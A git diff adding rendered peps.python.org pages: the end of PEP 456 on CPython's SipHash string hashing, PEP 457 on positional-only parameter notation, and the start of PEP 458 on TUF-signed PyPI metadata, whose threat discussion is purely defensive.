Aumasson, Bernstein and Boßlet have shown [sip] [ocert-2012-001] that +Murmur3 is not resilient against hash collision attacks. Therefore, Murmur3 +can no longer be considered as secure algorithm. It still may be an +alternative if hash collision attacks are of no concern.

+
+
+

CityHash

+

CityHash [city] is a family of non-cryptographic hash function developed by +Geoff Pike and Jyrki Alakuijala for Google. The C++ reference implementation +has been released under MIT license. The algorithm is partly based on +MurmurHash and claims to be faster. It supports 64- and 128-bit output with a +128-bit seed as well as 32-bit output without seed.

+

The relevant function prototype for 64-bit CityHash with 128-bit seed is:

+
uint64 CityHash64WithSeeds(const char *buf, size_t len, uint64 seed0,
+                           uint64 seed1)
+
+
+

CityHash also offers SSE 4.2 optimizations with CRC32 intrinsic for long +inputs. All variants except CityHash32 require 64-bit data types. CityHash32 +uses only 32-bit data types but it doesn’t support seeding.

+

Like MurmurHash Aumasson, Bernstein and Boßlet have shown [sip] a similar +weakness in CityHash.

+
+
+

DJBX33A

+

DJBX33A is a very simple multiplication and addition algorithm by Daniel +J. Bernstein. It is fast and has low setup costs but it’s not secure against +hash collision attacks. Its properties make it a viable choice for small +string hashing optimization.

+
+
+

Other

+

Crypto algorithms such as HMAC, MD5, SHA-1 or SHA-2 are too slow and have +high setup and finalization costs. For these reasons they are not considered +fit for this purpose. Modern AMD and Intel CPUs have AES-NI (AES instruction +set) [aes-ni] to speed up AES encryption. CMAC with AES-NI might be a viable +option but it’s probably too slow for daily operation. (testing required)

+
+
+

Conclusion

+

SipHash provides the best combination of speed and security. Developers of +other prominent projects have came to the same conclusion.

+
+
+
+

Small string optimization

+

Hash functions like SipHash24 have a costly initialization and finalization +code that can dominate speed of the algorithm for very short strings. On the +other hand, Python calculates the hash value of short strings quite often. A +simple and fast function for especially for hashing of small strings can make +a measurable impact on performance. For example, these measurements were taken +during a run of Python’s regression tests. Additional measurements of other +code have shown a similar distribution.

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
byteshash() callsportion
1187090.2%
27374809.5%
363617817.6%
4151831336.7%
564302244.9%
677047854.6%
752515061.2%
830487365.1%
929727268.8%
106819169.7%
11138848487.2%
1248078693.3%
135273093.9%
146530994.8%
154424595.3%
168564396.4%
Total7921678
+

However a fast function like DJBX33A is not as secure as SipHash24. A cutoff +at about 5 to 7 bytes should provide a decent safety margin and speed up at +the same time. The PEP’s reference implementation provides such a cutoff with +Py_HASH_CUTOFF. The optimization is disabled by default for several +reasons. For one the security implications are unclear yet and should be +thoroughly studied before the optimization is enabled by default. Secondly +the performance benefits vary. On 64 bit Linux system with Intel Core i7 +multiple runs of Python’s benchmark suite [pybench] show an average speedups +between 3% and 5% for benchmarks such as django_v2, mako and etree with a +cutoff of 7. Benchmarks with X86 binaries and Windows X86_64 builds on the +same machine are a bit slower with small string optimization.

+

The state of small string optimization will be assessed during the beta phase +of Python 3.4. The feature will either be enabled with appropriate values +or the code will be removed before beta 2 is released.

+
+
+

C API additions

+

All C API extension modifications are not part of the stable API.

+
+

hash secret

+

The _Py_HashSecret_t type of Python 2.6 to 3.3 has two members with either +32- or 64-bit length each. SipHash requires two 64-bit unsigned integers as +keys. The typedef will be changed to a union with a guaranteed size of 24 +bytes on all architectures. The union provides a 128 bit random key for +SipHash24 and FNV as well as an additional value of 64 bit for the optional +small string optimization and pyexpat seed. The additional 64 bit seed ensures +that pyexpat or small string optimization cannot reveal bits of the SipHash24 +seed.

+

memory layout on 64 bit systems:

+
cccccccc cccccccc cccccccc  uc -- unsigned char[24]
+pppppppp ssssssss ........  fnv -- two Py_hash_t
+k0k0k0k0 k1k1k1k1 ........  siphash -- two PY_UINT64_T
+........ ........ ssssssss  djbx33a -- 16 bytes padding + one Py_hash_t
+........ ........ eeeeeeee  pyexpat XML hash salt
+
+
+

memory layout on 32 bit systems:

+
cccccccc cccccccc cccccccc  uc -- unsigned char[24]
+ppppssss ........ ........  fnv -- two Py_hash_t
+k0k0k0k0 k1k1k1k1 ........  siphash -- two PY_UINT64_T (if available)
+........ ........ ssss....  djbx33a -- 16 bytes padding + one Py_hash_t
+........ ........ eeee....  pyexpat XML hash salt
+
+
+

new type definition:

+
typedef union {
+    /* ensure 24 bytes */
+    unsigned char uc[24];
+    /* two Py_hash_t for FNV */
+    struct {
+        Py_hash_t prefix;
+        Py_hash_t suffix;
+    } fnv;
+#ifdef PY_UINT64_T
+    /* two uint64 for SipHash24 */
+    struct {
+        PY_UINT64_T k0;
+        PY_UINT64_T k1;
+    } siphash;
+#endif
+    /* a different (!) Py_hash_t for small string optimization */
+    struct {
+        unsigned char padding[16];
+        Py_hash_t suffix;
+    } djbx33a;
+    struct {
+        unsigned char padding[16];
+        Py_hash_t hashsalt;
+    } expat;
+} _Py_HashSecret_t;
+PyAPI_DATA(_Py_HashSecret_t) _Py_HashSecret;
+
+
+

_Py_HashSecret_t is initialized in Python/random.c:_PyRandom_Init() +exactly once at startup.

+
+
+

hash function definition

+

Implementation:

+
typedef struct {
+    /* function pointer to hash function, e.g. fnv or siphash24 */
+    Py_hash_t (*const hash)(const void *, Py_ssize_t);
+    const char *name;       /* name of the hash algorithm and variant */
+    const int hash_bits;    /* internal size of hash value */
+    const int seed_bits;    /* size of seed input */
+} PyHash_FuncDef;
+
+PyAPI_FUNC(PyHash_FuncDef*) PyHash_GetFuncDef(void);
+
+
+
+
+

autoconf

+

A new test is added to the configure script. The test sets +HAVE_ALIGNED_REQUIRED, when it detects a platform, that requires aligned +memory access for integers. Must current platforms such as X86, X86_64 and +modern ARM don’t need aligned data.

+

A new option --with-hash-algorithm enables the user to select a hash +algorithm in the configure step.

+
+
+

hash function selection

+

The value of the macro Py_HASH_ALGORITHM defines which hash algorithm is +used internally. It may be set to any of the three values Py_HASH_SIPHASH24, +Py_HASH_FNV or Py_HASH_EXTERNAL. If Py_HASH_ALGORITHM is not +defined at all, then the best available algorithm is selected. On platforms +which don’t require aligned memory access (HAVE_ALIGNED_REQUIRED not +defined) and an unsigned 64 bit integer type PY_UINT64_T, SipHash24 is +used. On strict C89 platforms without a 64 bit data type, or architectures such +as SPARC, FNV is selected as fallback. A hash algorithm can be selected with +an autoconf option, for example ./configure --with-hash-algorithm=fnv.

+

The value Py_HASH_EXTERNAL allows 3rd parties to provide their own +implementation at compile time.

+

Implementation:

+
#if Py_HASH_ALGORITHM == Py_HASH_EXTERNAL
+extern PyHash_FuncDef PyHash_Func;
+#elif Py_HASH_ALGORITHM == Py_HASH_SIPHASH24
+static PyHash_FuncDef PyHash_Func = {siphash24, "siphash24", 64, 128};
+#elif Py_HASH_ALGORITHM == Py_HASH_FNV
+static PyHash_FuncDef PyHash_Func = {fnv, "fnv", 8 * sizeof(Py_hash_t),
+                                     16 * sizeof(Py_hash_t)};
+#endif
+
+
+
+
+
+

Python API addition

+
+

sys module

+

The sys module already has a hash_info struct sequence. More fields are added +to the object to reflect the active hash algorithm and its properties.

+
sys.hash_info(width=64,
+              modulus=2305843009213693951,
+              inf=314159,
+              nan=0,
+              imag=1000003,
+              # new fields:
+              algorithm='siphash24',
+              hash_bits=64,
+              seed_bits=128,
+              cutoff=0)
+
+
+
+
+
+

Necessary modifications to C code

+
+

_Py_HashBytes() (Objects/object.c)

+

_Py_HashBytes is an internal helper function that provides the hashing +code for bytes, memoryview and datetime classes. It currently implements FNV +for unsigned char *.

+

The function is moved to Python/pyhash.c and modified to use the hash function +through PyHash_Func.hash(). The function signature is altered to take +a const void * as first argument. _Py_HashBytes also takes care of +special cases: it maps zero length input to 0 and return value of -1 +to -2.

+
+
+

bytes_hash() (Objects/bytesobject.c)

+

bytes_hash uses _Py_HashBytes to provide the tp_hash slot function +for bytes objects. The function will continue to use _Py_HashBytes +but without a type cast.

+
+
+

memory_hash() (Objects/memoryobject.c)

+

memory_hash provides the tp_hash slot function for read-only memory +views if the original object is hashable, too. It’s the only function that +has to support hashing of unaligned memory segments in the future. The +function will continue to use _Py_HashBytes but without a type cast.

+
+
+

unicode_hash() (Objects/unicodeobject.c)

+

unicode_hash provides the tp_hash slot function for unicode. Right now it +implements the FNV algorithm three times for unsigned char*, Py_UCS2 +and Py_UCS4. A reimplementation of the function must take care to use the +correct length. Since the macro PyUnicode_GET_LENGTH returns the length +of the unicode string and not its size in octets, the length must be +multiplied with the size of the internal unicode kind:

+
if (PyUnicode_READY(u) == -1)
+    return -1;
+x = _Py_HashBytes(PyUnicode_DATA(u),
+                  PyUnicode_GET_LENGTH(u) * PyUnicode_KIND(u));
+
+
+
+
+

generic_hash() (Modules/_datetimemodule.c)

+

generic_hash acts as a wrapper around _Py_HashBytes for the tp_hash +slots of date, time and datetime types. timedelta objects are hashed by their +state (days, seconds, microseconds) and tzinfo objects are not hashable. The +data members of date, time and datetime types’ struct are not void* aligned. +This can easily by fixed with memcpy()ing four to ten bytes to an aligned +buffer.

+
+
+
+

Performance

+

In general the PEP 456 code with SipHash24 is about as fast as the old code +with FNV. SipHash24 seems to make better use of modern compilers, CPUs and +large L1 cache. Several benchmarks show a small speed improvement on 64 bit +CPUs such as Intel Core i5 and Intel Core i7 processes. 32 bit builds and +benchmarks on older CPUs such as an AMD Athlon X2 are slightly slower with +SipHash24. The performance increase or decrease are so small that they should +not affect any application code.

+

The benchmarks were conducted on CPython default branch revision b08868fd5994 +and the PEP repository [pep-456-repos]. All upstream changes were merged +into the pep-456 branch. The “performance” CPU governor was configured and +almost all programs were stopped so the benchmarks were able to utilize +TurboBoost and the CPU caches as much as possible. The raw benchmark results +of multiple machines and platforms are made available at [benchmarks].

+
+

Hash value distribution

+

A good distribution of hash values is important for dict and set performance. +Both SipHash24 and FNV take the length of the input into account, so that +strings made up entirely of NULL bytes don’t have the same hash value. The +last bytes of the input tend to affect the least significant bits of the hash +value, too. That attribute reduces the amount of hash collisions for strings +with a common prefix.

+
+
+

Typical length

+

Serhiy Storchaka has shown in [issue16427] that a modified FNV +implementation with 64 bits per cycle is able to process long strings several +times faster than the current FNV implementation.

+

However, according to statistics [issue19183] a typical Python program as +well as the Python test suite have a hash ratio of about 50% small strings +between 1 and 6 bytes. Only 5% of the strings are larger than 16 bytes.

+
+
+

Grand Unified Python Benchmark Suite

+

Initial tests with an experimental implementation and the Grand Unified Python +Benchmark Suite have shown minimal deviations. The summarized total runtime +of the benchmark is within 1% of the runtime of an unmodified Python 3.4 +binary. The tests were run on an Intel i7-2860QM machine with a 64-bit Linux +installation. The interpreter was compiled with GCC 4.7 for 64- and 32-bit.

+

More benchmarks will be conducted.

+
+
+
+

Backwards Compatibility

+

The modifications don’t alter any existing API.

+

The output of hash() for strings and bytes are going to be different. The +hash values for ASCII Unicode and ASCII bytes will stay equal.

+
+
+

Alternative counter measures against hash collision DoS

+

Three alternative countermeasures against hash collisions were discussed in +the past, but are not subject of this PEP.

+
    +
  1. Marc-Andre Lemburg has suggested that dicts shall count hash collisions. In +case an insert operation causes too many collisions an exception shall be +raised.
  2. +
  3. Some applications (e.g. PHP) limit the amount of keys for GET and POST +HTTP requests. The approach effectively leverages the impact of a hash +collision attack. (XXX citation needed)
  4. +
  5. Hash maps have a worst case of O(n) for insertion and lookup of keys. This +results in a quadratic runtime during a hash collision attack. The +introduction of a new and additional data structure with O(log n) +worst case behavior would eliminate the root cause. A data structures like +red-black-tree or prefix trees (trie [trie]) would have other benefits, +too. Prefix trees with stringed keyed can reduce memory usage as common +prefixes are stored within the tree structure.
  6. +
+
+
+

Discussion

+
+

Pluggable

+

The first draft of this PEP made the hash algorithm pluggable at runtime. It +supported multiple hash algorithms in one binary to give the user the +possibility to select a hash algorithm at startup. The approach was considered +an unnecessary complication by several core committers [pluggable]. Subsequent +versions of the PEP aim for compile time configuration.

+
+
+

Non-aligned memory access

+

The implementation of SipHash24 were criticized because it ignores the issue +of non-aligned memory and therefore doesn’t work on architectures that +requires alignment of integer types. The PEP deliberately neglects this +special case and doesn’t support SipHash24 on such platforms. It’s simply +not considered worth the trouble until proven otherwise. All major platforms +like X86, X86_64 and ARMv6+ can handle unaligned memory with minimal or even +no speed impact. [alignmentmyth]

+

Almost every block is properly aligned anyway. At present bytes’ and str’s +data are always aligned. Only memoryviews can point to unaligned blocks +under rare circumstances. The PEP implementation is optimized and simplified +for the common case.

+
+
+

ASCII str / bytes hash collision

+

Since the implementation of PEP 393, bytes and ASCII text have the same +memory layout. Because of this the new hashing API will keep the invariant:

+
hash("ascii string") == hash(b"ascii string")
+
+
+

for ASCII string and ASCII bytes. Equal hash values result in a hash collision +and therefore cause a minor speed penalty for dicts and sets with mixed keys. +The cause of the collision could be removed by e.g. subtracting 2 from +the hash value of bytes. -2 because hash(b"") == 0 and -1 is +reserved. The PEP doesn’t change the hash value.

+
+
+
+

References

+
    +
  • Issue 19183 [issue19183] contains a reference implementation.
  • +
+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0456.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0457/index.html b/pep-0457/index.html new file mode 100644 index 00000000000..a16c5dca36c --- /dev/null +++ b/pep-0457/index.html @@ -0,0 +1,374 @@ + + + + + + + + PEP 457 – Notation For Positional-Only Parameters | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 457 – Notation For Positional-Only Parameters

+
+
Author:
+
Larry Hastings <larry at hastings.org>
+
Discussions-To:
+
Python-Dev list
+
Status:
+
Final
+
Type:
+
Informational
+
Created:
+
08-Oct-2013
+
+
+
+
Table of Contents +
+
+

Overview

+

This PEP proposes a notation for positional-only parameters in Python. +Positional-only parameters are parameters without an externally-usable +name; when a function accepting positional-only parameters is called, +positional arguments are mapped to these parameters based solely on +their position.

+

This PEP is an Informational PEP describing the notation for use when +describing APIs that use positional-only parameters (e.g. in Argument +Clinic, or in the string representation of inspect.Signature +objects). A separate PEP, PEP 570, proposes elevation of this notation +to full Python syntax.

+
+
+

Rationale

+

Python has always supported positional-only parameters. +Early versions of Python lacked the concept of specifying +parameters by name, so naturally all parameters were +positional-only. This changed around Python 1.0, when +all parameters suddenly became positional-or-keyword. +But, even in current versions of Python, many CPython +“builtin” functions still only accept positional-only +arguments.

+

Functions implemented in modern Python can accept +an arbitrary number of positional-only arguments, via the +variadic *args parameter. However, there is no Python +syntax to specify accepting a specific number of +positional-only parameters. Put another way, there are +many builtin functions whose signatures are simply not +expressible with Python syntax.

+

This PEP proposes a notation for such signatures that could form the +basis of a backwards-compatible syntax that should permit implementing +any builtin in pure Python code (see PEP 570 for that proposal).

+
+

Positional-Only Parameter Semantics In Current Python

+

There are many, many examples of builtins that only +accept positional-only parameters. The resulting +semantics are easily experienced by the Python +programmer–just try calling one, specifying its +arguments by name:

+
>>> pow(x=5, y=3)
+Traceback (most recent call last):
+  File "<stdin>", line 1, in <module>
+TypeError: pow() takes no keyword arguments
+
+
+

In addition, there are some functions with particularly +interesting semantics:

+
    +
  • range(), which accepts an optional parameter +to the left of its required parameter. [2]
  • +
  • dict(), whose mapping/iterator parameter is optional and +semantically must be positional-only. Any externally +visible name for this parameter would occlude +that name going into the **kwarg keyword variadic +parameter dict! [1]
  • +
+

Obviously one can simulate any of these in pure Python code +by accepting (*args, **kwargs) and parsing the arguments +by hand. But this results in a disconnect between the +Python function’s signature and what it actually accepts, +not to mention the work of implementing said argument parsing.

+
+
+
+

Motivation

+

This PEP does not propose we implement positional-only +parameters in Python. The goal of this PEP is simply +to define the syntax, so that:

+
    +
  • Documentation can clearly, unambiguously, and +consistently express exactly how the arguments +for a function will be interpreted.
  • +
  • The syntax is reserved for future use, in case +the community decides someday to add positional-only +parameters to the language.
  • +
  • Argument Clinic can use a variant of the syntax +as part of its input when defining +the arguments for built-in functions.
  • +
+
+
+

The Current State Of Documentation For Positional-Only Parameters

+

The documentation for positional-only parameters is incomplete +and inconsistent:

+
    +
  • Some functions denote optional groups of positional-only arguments +by enclosing them in nested square brackets. [3]
  • +
  • Some functions denote optional groups of positional-only arguments +by presenting multiple prototypes with varying numbers of +arguments. [4]
  • +
  • Some functions use both of the above approaches. [2] [5]
  • +
+

One more important idea to consider: currently in the documentation +there’s no way to tell whether a function takes positional-only +parameters. open() accepts keyword arguments, ord() does +not, but there is no way of telling just by reading the +documentation that this is true.

+
+
+

Syntax And Semantics

+

From the “ten-thousand foot view”, and ignoring *args and **kwargs +for now, the grammar for a function definition currently looks like this:

+
def name(positional_or_keyword_parameters, *, keyword_only_parameters):
+
+
+

Building on that perspective, the new syntax for functions would look +like this:

+
def name(positional_only_parameters, /, positional_or_keyword_parameters,
+         *, keyword_only_parameters):
+
+
+

All parameters before the / are positional-only. If / is +not specified in a function signature, that function does not +accept any positional-only parameters.

+

Positional-only parameters can have a default value, and if they +do they are optional. Positional-only parameters that don’t have +a default value are “required” positional-only parameters.

+

More semantics of positional-only parameters:

+
    +
  • Although positional-only parameter technically have names, +these names are internal-only; positional-only parameters +are never externally addressable by name. (Similarly +to *args and **kwargs.)
  • +
  • If there are arguments after the /, then you must specify +a comma after the /, just as there is a comma +after the * denoting the shift to keyword-only parameters.
  • +
  • This syntax has no effect on *args or **kwargs.
  • +
+
+
+

Additional Limitations

+

Argument Clinic uses a form of this syntax for specifying +builtins. It imposes further limitations that are +theoretically unnecessary but make the implementation +easier. Specifically:

+
    +
  • A function that has positional-only parameters currently +cannot have any other kind of parameter. (This will +probably be relaxed slightly in the near future.)
  • +
  • Argument Clinic supports an additional syntax called +“optional groups”. An “optional group” is a sequential +set of positional-only parameters that must be specified +or not-specified as a group. If, for example, you define +a function in Argument Clinic that takes four parameters, +and all of them are positional-only and in one optional +group, then when calling the function you must specify +either zero arguments or four arguments. This is necessary +to cover more of Python’s legacy library, but is outside +the scope of this PEP, and is not recommended for actual +inclusion in the Python language.
  • +
+
+
+

Notes For A Future Implementor

+

If we decide to implement positional-only parameters in a future +version of Python, we’d have to do some additional work to preserve +their semantics. The problem: how do we inform a parameter that +no value was passed in for it when the function was called?

+

The obvious solution: add a new singleton constant to Python +that is passed in when a parameter is not mapped to an argument. +I propose that the value be called undefined, +and be a singleton of a special class called Undefined. +If a positional-only parameter did not receive an argument +when called, its value would be set to undefined.

+

But this raises a further problem. How do can we tell the +difference between “this positional-only parameter did not +receive an argument” and “the caller passed in undefined +for this parameter”?

+

It’d be nice to make it illegal to pass undefined in +as an argument to a function–to, say, raise an exception. +But that would slow Python down, and the “consenting adults” +rule appears applicable here. So making it illegal should +probably be strongly discouraged but not outright prevented.

+

However, it should be allowed (and encouraged) for user +functions to specify undefined as a default value for +parameters.

+
+
+

Unresolved Questions

+

There are three types of parameters in Python:

+
    +
  1. positional-only parameters,
  2. +
  3. positional-or-keyword parameters, and
  4. +
  5. keyword-only parameters.
  6. +
+

Python allows functions to have both 2 and 3. And some +builtins (e.g. range) have both 1 and 3. Does it make +sense to have functions that have both 1 and 2? Or +all of the above?

+
+
+

Thanks

+

Credit for the use of ‘/’ as the separator between positional-only and positional-or-keyword +parameters goes to Guido van Rossum, in a proposal from 2012. [6]

+

Credit for making left option groups higher precedence goes to +Alyssa Coghlan. (Conversation in person at PyCon US 2013.)

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0457.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0458/index.html b/pep-0458/index.html new file mode 100644 index 00000000000..b0005f07a8a --- /dev/null +++ b/pep-0458/index.html @@ -0,0 +1,1491 @@ + + + + + + + + PEP 458 – Secure PyPI downloads with signed repository metadata | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 458 – Secure PyPI downloads with signed repository metadata

+
+
Author:
+
Trishank Karthik Kuppusamy <karthik at trishank.com>, +Vladimir Diaz <vladimir.diaz at nyu.edu>, +Marina Moore <mm9693 at nyu.edu>, +Lukas Puehringer <lukas.puehringer at nyu.edu>, +Joshua Lock <jlock at vmware.com>, +Lois Anne DeLong <lad278 at nyu.edu>, +Justin Cappos <jcappos at nyu.edu>
+
Sponsor:
+
Alyssa Coghlan <ncoghlan at gmail.com>
+
BDFL-Delegate:
+
Donald Stufft <donald at stufft.io>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Accepted
+
Type:
+
Standards Track
+
Topic:
+
Packaging
+
Created:
+
27-Sep-2013
+
Post-History:
+
06-Jan-2019, 13-Nov-2019
+
Resolution:
+
Discourse message
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP describes changes to the PyPI infrastructure that are needed to ensure +that users get valid packages from PyPI. These changes should have minimal +impact on other parts of the ecosystem. The PEP focuses on communication between +PyPI and users, and so does not require any action by package developers. +Developers will upload packages using the current process, and PyPI will +automatically generate signed repository metadata for these packages.

+

In order for the security mechanism to be +effective, additional work will need to be done by PyPI consumers (like pip) to +verify the signatures and metadata provided by PyPI. This verification can be +transparent to users (unless it fails) and provides an automatic security +mechanism. There is documentation for how to consume TUF metadata in the TUF +repository. However, changes to PyPI consumers are not a pre-requisite for +publishing the metadata from PyPI, and can be done +according to the timelines and priorities of individual projects.

+
+
+

Proposed TUF Integration

+

This PEP proposes how The Update Framework [2] (TUF) should be integrated with the +Python Package Index (PyPI [1]). TUF was designed to be a flexible +security add-on to a software updater or package manager. A full implementation +of the framework +integrates best security practices, such as separating role responsibilities, +adopting the many-man rule for signing packages, keeping signing keys offline, +and revocation of expired or compromised signing keys. As a result, attackers +would need to steal multiple signing keys, which are stored independently, +in order to compromise the role responsible for specifying a repository’s available +files. Or, alternatively, a role +responsible for indicating the latest snapshot of the repository may also have to be +compromised.

+

The initial integration proposed in this PEP will allow modern package managers, +such as pip [3], to be more secure against attacks on PyPI mirrors and PyPI’s +own content distribution network, and to better protect users from such attacks. +Specifically, this PEP describes how PyPI processes +should be adapted to generate and incorporate TUF metadata (i.e., the minimum +security model). This minimum security model supports verification of PyPI +distributions that are signed with keys stored on PyPI. Distributions that are +uploaded by developers are signed by PyPI, requiring no action from developers +(other than uploading the distribution), and are immediately available for +download. The minimum security model also minimizes PyPI administrative +responsibilities by automating much of the signing process.

+

There is no discussion in this PEP of support for project distributions that +are signed by developers (maximum security model). This possible future extension +is covered in detail in PEP 480. The maximum security model requires more PyPI +administrative work (though no added work for clients), and also proposes +an easy-to-use key management solution for developers/publishers, ideas on how +to interface with a potential future build farm on PyPI infrastructure, and the +feasibility of end-to-end signing.

+

While it does provide implementation recommendations, this PEP does not +prescribe exactly how package managers, such as pip, should be adapted +to install or update projects from PyPI with TUF metadata. Package managers +interested in adopting TUF on the client side may consult its library +documentation, which was created for this purpose.

+
+
+

Non-goals

+

This PEP does not eliminate any existing features from PyPI. In particular, it +does not replace existing support for OpenPGP signatures. Developers can continue +to upload detached OpenPGP signatures along with distributions. In the future, +PEP 480 may allow developers to directly sign TUF metadata using their OpenPGP keys.

+
+
+

PEP Status

+

Due to the amount of work required to implement this PEP, in early +2019 it was deferred until appropriate funding could be secured to +implement the PEP. The Python Software Foundation secured this funding +[22] and new PEP coauthors restarted PEP discussion.

+
+
+

Motivation

+

Attacks on software repositories are common, even in organizations with very +good security practices. The resulting repository compromise allows an +attacker to edit all files stored on the repository and sign these files using +any keys stored on the repository (online keys). In many signing schemes (like +TLS), this access allows the attacker to replace files on the repository and +make it look like these files are coming from PyPI. Without a way to revoke and +replace the trusted private key, it is very challenging to recover from a +repository compromise. In addition to the dangers of repository compromise, +software repositories are vulnerable to an attacker on the network (MITM) +intercepting and changing files. These and other attacks on software +repositories are detailed here.

+

This PEP, together with the follow-up proposal in PEP 480, aims to protect users +of PyPI from compromises of the integrity, consistency, and freshness properties +of PyPI packages, and enhances compromise resilience by mitigating key risk and +providing mechanisms to recover from a compromise of PyPI or its signing keys.

+

On January 5, 2013, the Python Software Foundation (PSF) announced that [4] a security +breach had occurred on the +python.org wikis for Python and Jython. As a result, all of the wiki data was destroyed. +Fortunately, the PyPI infrastructure was not affected by this breach. +However, the incident is a reminder that PyPI needed to take defensive steps to +protect users as much as possible in the event of a compromise. Attacks on +software repositories happen all the time [5]. The PSF must accept the +possibility of security breaches and prepare PyPI accordingly because it is a +valuable resource used by thousands, if not millions, of people.

+

Before the wiki attack, PyPI used MD5 hashes to tell package managers, such as +pip, whether or not a distribution file was corrupted in transit. However, the absence +of SSL made it hard for package managers to verify transport integrity to PyPI. +It was therefore easy to launch a man-in-the-middle attack between pip and +PyPI, and arbitrarily change the content of distributions. As a result, users could be tricked into +installing malicious distributions. After the wiki +attack, several steps were proposed (some of which were implemented) to deliver +a much higher level of security than was previously the case. These steps included +requiring SSL to +communicate with PyPI [6], restricting project names [7], and migrating from +MD5 to SHA-2 hashes [8].

+

Though necessary, these steps are insufficient to protect distributions because attacks are still +possible through other avenues. For example, a public mirror is trusted to +honestly mirror PyPI, but some mirrors may misbehave, whether by accident or through +malicious intervention. +Package managers such as pip are supposed to use signatures from PyPI to verify +distribution files downloaded from a public mirror, but none are known to actually +do so [10]. Therefore, it would be wise to add more security measures to +detect attacks from public mirrors or content delivery networks [11] (CDNs).

+

Even though official mirrors have been deprecated on PyPI, a +wide variety of other attack vectors on package managers remain [13]. These attacks +can crash client systems, cause obsolete distributions to be installed, or even +allow an attacker to execute arbitrary code. In September 2013, a post was +made to the Distutils mailing list showing that the latest version of pip (at +the time) was susceptible to such attacks, and how TUF could protect users +against them [14]. Specifically, testing was done to see how pip would +respond to these attacks with and without TUF. Attacks tested included replay +and freeze, arbitrary installation, slow retrieval, and endless data. The post +also included a demonstration of how pip would respond if PyPI were +compromised.

+

To provide compromise resilient protection of PyPI, this PEP proposes the use of +The Update Framework [2] (TUF). TUF provides protection from a variety of +attacks on software update systems, while also providing mechanisms to recover +from a repository compromise. TUF has been used in production by a number of +organizations, including use in Cloud Native Computing Foundation’s Notary +service, which provides the infrastructure for container image signing in Docker +Registry. The TUF specification has been the subject of three independent +security audits.

+

The scope of this PEP is protecting users from compromises of PyPI mirrors, +and PyPI’s own TLS termination and content distribution infrastructure. +Protection from compromises of PyPI itself is discussed in PEP 480.

+
+
+

Threat Model

+

The threat model assumes the following:

+
    +
  • Offline keys are safe and securely stored.
  • +
  • Attackers cannot compromise PyPI’s trusted keys stored online.
  • +
  • Attackers can respond to client requests.
  • +
+

An attacker is considered successful if it can cause a client to install (or +leave installed) something other than the most up-to-date version of a +software distribution file. If the attacker is preventing the installation +of updates, they do not want clients to realize there is anything wrong.

+

This threat model describes the minimum security model. The maximum security +model described in PEP 480 also assumes that attackers can compromise PyPI’s +online keys.

+
+
+

Definitions

+

The keywords “MUST”, “MUST NOT”, “REQUIRED”, “SHALL”, “SHALL NOT”, “SHOULD”, +“SHOULD NOT”, “RECOMMENDED”, “MAY”, and “OPTIONAL” in this document are to be +interpreted as described in RFC 2119.

+

This PEP focuses only on integrating TUF into PyPI. However, the reader is +encouraged to review TUF design principles [2] and SHOULD be +familiar with the TUF specification [16].

+

The following terms used in this PEP are defined in the Python Packaging +Glossary [17]: project, release, distribution.

+

Additional terms used in this PEP are defined as follows:

+
    +
  • Role: TUF specifies one root role and multiple other roles to which the +root role delegates responsibilities, directly or indirectly. The term +top-level role refers to the root role and any role specified directly by +the root role, i.e. timestamp, snapshot and targets roles. Each role +has a single metadata file that it is trusted to provide.
  • +
  • Distribution file: A versioned archive file that contains Python packages, +modules, and other resource files that are used to distribute a release. The +terms distribution file, distribution package [17], or simply +distribution or package may be used interchangeably in this PEP.
  • +
  • Simple index: The HTML page that contains internal links to distribution +files.
  • +
  • Target files: As a rule of thumb, target files are all files on PyPI whose +integrity should be guaranteed with TUF. Typically, this includes +distribution files and PyPI metadata, such as simple indices.
  • +
  • Metadata: Metadata are signed files that describe roles, other metadata, and +target files. If not specified otherwise metadata means TUF-specific +metadata.
  • +
  • Repository: A repository is a source for named metadata and target +files. Clients request metadata and target files stored on a repository.
  • +
  • Consistent snapshot: A set of TUF metadata and target files that capture the +complete state of all projects on PyPI as they existed at some fixed point in +time.
  • +
  • Developer: Either the owner or maintainer of a project who is allowed to +update the TUF metadata, as well as target files for a project.
  • +
  • Online key: A private cryptographic key that MUST be stored on the PyPI +server infrastructure. This is usually to allow automated signing with the +key. However, an attacker who compromises the PyPI infrastructure will be +able to read these keys.
  • +
  • Offline key: A private cryptographic key that MUST be stored independent of +the PyPI server infrastructure. This prevents automated signing with the +key. An attacker who compromises the PyPI infrastructure will not be able to +immediately read these keys.
  • +
  • Threshold signature scheme: A role can increase its resilience to key +compromises by specifying that at least t out of n keys are REQUIRED to sign +its metadata. A compromise of t-1 keys is insufficient to compromise the +role itself. Saying that a role requires (t, n) keys denotes the threshold +signature property.
  • +
+
+
+

Overview of TUF

+

At its highest level, TUF provides applications with a secure method for +knowing about and obtaining new versions of files. On the +surface, this all sounds simple. The basic steps for updating applications are:

+
    +
  • Knowing an update exists.
  • +
  • Downloading a correct copy of the latest version of the updated file.
  • +
+

The problem is that updating applications is only simple when there are no +malicious activities in the picture. If an attacker is trying to interfere with +these seemingly simple steps, there is plenty they can do.

+

Assume a software updater takes the approach of most systems (at least the ones +that try to be secure). It downloads both the file it wants and a cryptographic +signature of the file. The software updater already knows which key it trusts +to make the signature. It checks that the signature is correct and was made by +this trusted key. Unfortunately, the software updater is still at risk in many +ways, including the following scenarios:

+
    +
  • An attacker keeps giving the software updater the same update file, so it +never realizes there is an update.
  • +
